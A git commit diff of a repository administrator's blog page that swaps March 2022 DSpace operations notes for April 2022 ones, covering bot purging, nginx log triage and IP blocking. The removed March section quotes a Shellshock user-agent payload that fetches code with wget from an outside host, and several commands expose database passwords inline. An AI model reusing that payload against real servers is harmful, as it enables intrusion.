mirror of
https://github.com/alanorth/cgspace-notes.git
synced 2025-01-27 05:49:12 +01:00
Add notes for 2022-04-24
This commit is contained in:
@ -6,34 +6,18 @@
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|
||||
|
||||
|
||||
<meta property="og:title" content="March, 2022" />
|
||||
<meta property="og:description" content="2022-03-01
|
||||
|
||||
Send Gaia the last batch of potential duplicates for items 701 to 980:
|
||||
|
||||
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
|
||||
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
|
||||
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
|
||||
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
|
||||
" />
|
||||
<meta property="og:title" content="April, 2022" />
|
||||
<meta property="og:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54." />
|
||||
<meta property="og:type" content="article" />
|
||||
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
|
||||
<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
|
||||
<meta property="article:modified_time" content="2022-04-04T19:15:58+03:00" />
|
||||
<meta property="article:published_time" content="2022-03-01T10:53:39+03:00" />
|
||||
<meta property="article:modified_time" content="2022-04-23T13:05:02+03:00" />
|
||||
|
||||
|
||||
|
||||
<meta name="twitter:card" content="summary"/>
|
||||
<meta name="twitter:title" content="March, 2022"/>
|
||||
<meta name="twitter:description" content="2022-03-01
|
||||
|
||||
Send Gaia the last batch of potential duplicates for items 701 to 980:
|
||||
|
||||
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
|
||||
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
|
||||
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
|
||||
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
|
||||
"/>
|
||||
<meta name="twitter:title" content="April, 2022"/>
|
||||
<meta name="twitter:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54."/>
|
||||
<meta name="generator" content="Hugo 0.96.0" />
|
||||
|
||||
|
||||
@ -42,11 +26,11 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
|
||||
{
|
||||
"@context": "http://schema.org",
|
||||
"@type": "BlogPosting",
|
||||
"headline": "March, 2022",
|
||||
"headline": "April, 2022",
|
||||
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
|
||||
"wordCount": "1836",
|
||||
"datePublished": "2022-03-01T16:46:54+03:00",
|
||||
"dateModified": "2022-04-04T19:15:58+03:00",
|
||||
"wordCount": "1048",
|
||||
"datePublished": "2022-03-01T10:53:39+03:00",
|
||||
"dateModified": "2022-04-23T13:05:02+03:00",
|
||||
"author": {
|
||||
"@type": "Person",
|
||||
"name": "Alan Orth"
|
||||
@ -59,7 +43,7 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
|
||||
|
||||
<link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-03/">
|
||||
|
||||
<title>March, 2022 | CGSpace Notes</title>
|
||||
<title>April, 2022 | CGSpace Notes</title>
|
||||
|
||||
|
||||
<!-- combined, minified CSS -->
|
||||
@ -111,352 +95,206 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
|
||||
|
||||
<article class="blog-post">
|
||||
<header>
|
||||
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
|
||||
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
|
||||
<p class="blog-post-meta">
|
||||
<time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time>
|
||||
<time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time>
|
||||
in
|
||||
<span class="fas fa-folder" aria-hidden="true"></span> <a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
|
||||
|
||||
|
||||
</p>
|
||||
</header>
|
||||
<h2 id="2022-03-01">2022-03-01</h2>
|
||||
<h2 id="2022-04-01">2022-04-01</h2>
|
||||
<ul>
|
||||
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
|
||||
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">'fuuu'</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
|
||||
</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
|
||||
<li>I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday
|
||||
<ul>
|
||||
<li>Looking over the CGSpace Solr statistics from 2022-02
|
||||
<ul>
|
||||
<li>I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!</li>
|
||||
<li>Here are some of the more prevalent or weird ones:
|
||||
<ul>
|
||||
<li>axios/0.21.1</li>
|
||||
<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
|
||||
<li>Nutraspace/Nutch-1.2 (<a href="https://www.nutraspace.com">www.nutraspace.com</a>)</li>
|
||||
<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
|
||||
<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
|
||||
<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
|
||||
<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
|
||||
<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
|
||||
<li>metha/0.2.27</li>
|
||||
<li>ZaloPC-win32-24v454</li>
|
||||
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
|
||||
<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
|
||||
<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
|
||||
<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
|
||||
<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
|
||||
<li>() { :;}; /bin/bash -c "wget -O /tmp/bbb <a href="https://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>"</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
|
||||
</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
|
||||
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-05">2022-03-05</h2>
|
||||
<ul>
|
||||
<li>Start AReS harvest</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-10">2022-03-10</h2>
|
||||
<ul>
|
||||
<li>A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
|
||||
<ul>
|
||||
<li>I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:</li>
|
||||
<li>The Discovery indexing took this long:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<pre tabindex="0"><code>or(
|
||||
isNotNull(value.match('707')),
|
||||
isNotNull(value.match('709')),
|
||||
isNotNull(value.match('710')),
|
||||
isNotNull(value.match('711')),
|
||||
isNotNull(value.match('713')),
|
||||
isNotNull(value.match('717')),
|
||||
isNotNull(value.match('718')),
|
||||
...
|
||||
isNotNull(value.match('821'))
|
||||
)
|
||||
</code></pre><ul>
|
||||
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Xmx1024m -Dfile.encoding=UTF-8"</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-10-tac-batch4-701to980.map
|
||||
</span></span></code></pre></div><h2 id="2022-03-12">2022-03-12</h2>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 334m33.625s
|
||||
</span></span><span style="display:flex;"><span>user 227m51.331s
|
||||
</span></span><span style="display:flex;"><span>sys 3m43.037s
|
||||
</span></span></code></pre></div><h2 id="2022-04-04">2022-04-04</h2>
|
||||
<ul>
|
||||
<li>Update all containers and rebuild OpenRXV on linode20:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">'s/ \+/:/g'</span> | cut -d: -f1,2 | xargs -L1 docker pull
|
||||
</span></span><span style="display:flex;"><span>$ docker-compose build
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Then run all system updates and reboot</li>
|
||||
<li>Start a full harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-16">2022-03-16</h2>
|
||||
<li>Help Marianne with submit/approve access on a new collection on CGSpace</li>
|
||||
<li>Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)</li>
|
||||
<li>Looking at the Solr statistics for 2022-03 on CGSpace
|
||||
<ul>
|
||||
<li>Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
|
||||
<ul>
|
||||
<li>We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing</li>
|
||||
<li>I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: <code>Apache-HttpClient/4.5.9 (Java/1.8.0_322)</code>, and many others with a normal browser agent, so that’s fishy!</li>
|
||||
<li>The DSpace agent pattern <code>http.?agent</code> seems to have caught the first ones, but I’ll purge the IP ones</li>
|
||||
<li>I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for <code>dns:*msnbot* AND dns:*.msn.com.</code> I see over 100,000, which is a problem I noticed a few months ago too…</li>
|
||||
<li>I extracted the MSN Bot IPs from Solr using an IP facet, then used the <code>check-spider-ip-hits.sh</code> script to purge them</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-20">2022-03-20</h2>
|
||||
<h2 id="2022-04-10">2022-04-10</h2>
|
||||
<ul>
|
||||
<li>Start a full harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-21">2022-03-21</h2>
|
||||
<h2 id="2022-04-13">2022-04-13</h2>
|
||||
<ul>
|
||||
<li>Review a few submissions for Open Repositories 2022</li>
|
||||
<li>Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-22">2022-03-22</h2>
|
||||
<li>UptimeRobot mailed to say that CGSpace was down
|
||||
<ul>
|
||||
<li>I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
|
||||
<ul>
|
||||
<li>I had been meaning to update my local database…</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I re-imported the CGIAR CAS documents to <a href="https://dspacetest.cgiar.org/handle/10568/118432">DSpace Test</a> and generated the PDF thumbnails:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Xmx1024m -Dfile.encoding=UTF-8"</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-22-tac-700.map
|
||||
</span></span><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Xmx1024m -Dfile.encoding=UTF-8"</span> dspace filter-media -p <span style="color:#e6db74">"ImageMagick PDF Thumbnail"</span> -i 10568/118432
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>On my local environment I decided to run the <code>check-duplicates.py</code> script one more time with all 700 items:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
|
||||
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p <span style="color:#e6db74">'dom@in34sniper'</span> -o /tmp/2022-03-22-tac-duplicates.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I sent the resulting 76 items to Gaia to check</li>
|
||||
<li>UptimeRobot said that CGSpace was down
|
||||
<ul>
|
||||
<li>I looked and found many locks belonging to the REST API application:</li>
|
||||
<li>I looked and found the load at 44…</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>There seem to be a lot of locks from the XMLUI:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;'</span> | grep -o -E <span style="color:#e6db74">'(dspaceWeb|dspaceApi)'</span> | sort | uniq -c | sort -n
|
||||
</span></span><span style="display:flex;"><span> 301 dspaceWeb
|
||||
</span></span><span style="display:flex;"><span> 2390 dspaceApi
|
||||
</span></span><span style="display:flex;"><span> 3173 dspaceWeb
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Looking at nginx’s logs, I found the top addresses making requests today:</li>
|
||||
<li>Looking at the top IPs in nginx’s access log one IP in particular stands out:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">'{print $1}'</span> /var/log/nginx/rest.log | sort | uniq -c | sort -h
|
||||
</span></span><span style="display:flex;"><span> 1977 45.5.184.2
|
||||
</span></span><span style="display:flex;"><span> 3167 70.32.90.172
|
||||
</span></span><span style="display:flex;"><span> 4754 54.195.118.125
|
||||
</span></span><span style="display:flex;"><span> 5411 205.186.128.185
|
||||
</span></span><span style="display:flex;"><span> 6826 137.184.159.211
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 941 66.249.66.222
|
||||
</span></span><span style="display:flex;"><span> 1224 95.108.213.28
|
||||
</span></span><span style="display:flex;"><span> 2074 157.90.209.76
|
||||
</span></span><span style="display:flex;"><span> 3064 66.249.66.221
|
||||
</span></span><span style="display:flex;"><span> 95743 185.192.69.15
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>137.184.159.211 is on DigitalOcean using this user agent: <code>GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28</code>
|
||||
<ul>
|
||||
<li>I blocked this IP in nginx and the load went down immediately</li>
|
||||
<li>185.192.69.15 is in the UK</li>
|
||||
<li>I added a block for that IP in nginx and the load went down…</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot</li>
|
||||
<li>54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)</li>
|
||||
<li>70.32.90.172 is on Media Temple and has no user agent</li>
|
||||
<li>What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
|
||||
<h2 id="2022-04-16">2022-04-16</h2>
|
||||
<ul>
|
||||
<li>I verified it works as expected with an empty user agent:</li>
|
||||
<li>Start harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-04-18">2022-04-18</h2>
|
||||
<ul>
|
||||
<li>I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter)
|
||||
<ul>
|
||||
<li>I see there are many locks in use from the XMLUI:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -H User-Agent:<span style="color:#e6db74">''</span> <span style="color:#e6db74">'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'</span>
|
||||
</span></span><span style="display:flex;"><span>Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;'</span> | grep -o -E <span style="color:#e6db74">'(dspaceWeb|dspaceApi)'</span> | sort | uniq -c
|
||||
</span></span><span style="display:flex;"><span> 8932 dspaceWeb
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I note that the nginx log shows ‘-’ for a request with an empty user agent, which would be indistinguishable from a request with a ‘-’, for example these were successful:</li>
|
||||
<li>Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
|
||||
</span></span><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">'{print $1}'</span> | sort | uniq -c | sort -h
|
||||
</span></span><span style="display:flex;"><span> 752 69.162.124.231
|
||||
</span></span><span style="display:flex;"><span> 759 66.249.64.213
|
||||
</span></span><span style="display:flex;"><span> 864 66.249.66.222
|
||||
</span></span><span style="display:flex;"><span> 905 2a01:4f8:221:f::2
|
||||
</span></span><span style="display:flex;"><span> 1013 84.33.2.97
|
||||
</span></span><span style="display:flex;"><span> 1201 157.55.39.159
|
||||
</span></span><span style="display:flex;"><span> 1204 157.55.39.144
|
||||
</span></span><span style="display:flex;"><span> 1209 157.55.39.102
|
||||
</span></span><span style="display:flex;"><span> 1217 157.55.39.161
|
||||
</span></span><span style="display:flex;"><span> 1252 207.46.13.177
|
||||
</span></span><span style="display:flex;"><span> 1274 157.55.39.162
|
||||
</span></span><span style="display:flex;"><span> 2553 66.249.66.221
|
||||
</span></span><span style="display:flex;"><span> 2941 95.108.213.28
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too</li>
|
||||
<li>Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that</li>
|
||||
<li>One IP is using a stange user agent though:</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-24">2022-03-24</h2>
|
||||
<ul>
|
||||
<li>Maria from ABC asked about a reporting discrepancy on AReS
|
||||
<ul>
|
||||
<li>I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
|
||||
<ul>
|
||||
<li>She asked if we can download them and upload them directly to CGSpace</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I re-created my local Artifactory container</li>
|
||||
<li>I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
|
||||
<ul>
|
||||
<li>One thing I realized is that OAI is no longer a standalone web application, it is part of the <code>server</code> app now: http://localhost:8080/server/oai/request?verb=Identify</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active
|
||||
<ul>
|
||||
<li>I did this on DSpace Test in 2022-02 so I just followed the same procedure</li>
|
||||
<li>After that I ran all system updates and rebooted the server</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-25">2022-03-25</h2>
|
||||
<ul>
|
||||
<li>Looking at the PostgreSQL database size on CGSpace after the update yesterday:</li>
|
||||
</ul>
|
||||
<p><img src="/cgspace-notes/2022/03/postgres_size_cgspace-day.png" alt="PostgreSQL database size day"></p>
|
||||
<ul>
|
||||
<li>The space saving in indexes of recent PostgreSQL releases is awesome!</li>
|
||||
<li>Import a DSpace 6.x database dump from production into my local DSpace 7 database
|
||||
<ul>
|
||||
<li>I see I still the same errors <a href="/cgspace-notes/2021-04/">I saw in 2021-04</a> when testing DSpace 7.0 beta 5</li>
|
||||
<li>I had to delete some old migrations, as well as all Atmire ones first:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
|
||||
</span></span><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%'
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Then I was able to migrate to DSpace 7 with <code>dspace database migrate ignored</code> as the <a href="https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace">DSpace upgrade notes say</a>
|
||||
<li>Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">'{print $1}'</span> | sort | uniq | wc -l
|
||||
</span></span><span style="display:flex;"><span>17314
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
|
||||
<ul>
|
||||
<li>I see that the <a href="https://github.com/DSpace/dspace-angular/issues/1357">flash of unstyled content bug</a> still exists on dspace-angluar… ouch!</li>
|
||||
<li>The ISPs I’ve seen so far are ChinaNet and China Unicom</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I extracted all the IPs from today and resolved them:</li>
|
||||
</ul>
|
||||
